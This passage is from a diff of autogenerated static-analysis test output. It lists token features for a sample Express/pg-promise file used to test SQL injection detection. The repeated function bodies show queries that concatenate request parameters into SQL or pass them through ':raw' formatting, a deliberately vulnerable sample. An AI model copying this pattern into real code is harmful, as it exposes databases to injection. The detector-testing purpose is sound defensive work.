ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:6:12:8 | map | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:6:12:8 | map | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:10:12:14 | query | CalleeFlexibleAccessPath | db.map | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:10:12:14 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:10:12:14 | query | calleeImports | pg-promise | @@ -3537,6 +17586,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:10:12:14 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:10:12:14 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:12:10:12:14 | query | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:10 | db.multi | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:10 | db.multi | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:10 | db.multi | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:10 | db.multi | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:10 | db.multi | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:17 | db.multi(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:17 | db.multi(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:17 | db.multi(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:17 | db.multi(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:17 | db.multi(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:17 | exceptional return of db.multi(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:17 | exceptional return of db.multi(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:17 | exceptional return of db.multi(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:17 | exceptional return of db.multi(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:3:13:17 | exceptional return of db.multi(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:6:13:10 | multi | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:6:13:10 | multi | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:6:13:10 | multi | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:6:13:10 | multi | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:6:13:10 | multi | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:12:13:16 | query | CalleeFlexibleAccessPath | db.multi | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:12:13:16 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:12:13:16 | query | calleeImports | pg-promise | @@ -3546,6 +17620,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:12:13:16 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:12:13:16 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:13:12:13:16 | query | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:16 | db.multiResult | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:16 | db.multiResult | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:16 | db.multiResult | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:16 | db.multiResult | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:16 | db.multiResult | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:23 | db.mult ... (query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:23 | db.mult ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:23 | db.mult ... (query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:23 | db.mult ... (query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:23 | db.mult ... (query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:23 | exceptional return of db.mult ... (query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:23 | exceptional return of db.mult ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:23 | exceptional return of db.mult ... (query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:23 | exceptional return of db.mult ... (query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:3:14:23 | exceptional return of db.mult ... (query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:6:14:16 | multiResult | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:6:14:16 | multiResult | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:6:14:16 | multiResult | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:6:14:16 | multiResult | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:6:14:16 | multiResult | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:18:14:22 | query | CalleeFlexibleAccessPath | db.multiResult | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:18:14:22 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:18:14:22 | query | calleeImports | pg-promise | @@ -3555,6 +17654,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:18:14:22 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:18:14:22 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:14:18:14:22 | query | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:9 | db.none | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:9 | db.none | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:9 | db.none | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:9 | db.none | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:9 | db.none | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:16 | db.none(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:16 | db.none(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:16 | db.none(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:16 | db.none(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:16 | db.none(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:16 | exceptional return of db.none(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:16 | exceptional return of db.none(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:16 | exceptional return of db.none(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:16 | exceptional return of db.none(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:3:15:16 | exceptional return of db.none(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:6:15:9 | none | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:6:15:9 | none | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:6:15:9 | none | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:6:15:9 | none | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:6:15:9 | none | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:11:15:15 | query | CalleeFlexibleAccessPath | db.none | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:11:15:15 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:11:15:15 | query | calleeImports | pg-promise | @@ -3564,6 +17688,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:11:15:15 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:11:15:15 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:15:11:15:15 | query | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:8 | db.one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:8 | db.one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:8 | db.one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:8 | db.one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:8 | db.one | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:15 | db.one(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:15 | db.one(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:15 | db.one(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:15 | db.one(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:15 | db.one(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:15 | exceptional return of db.one(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:15 | exceptional return of db.one(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:15 | exceptional return of db.one(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one 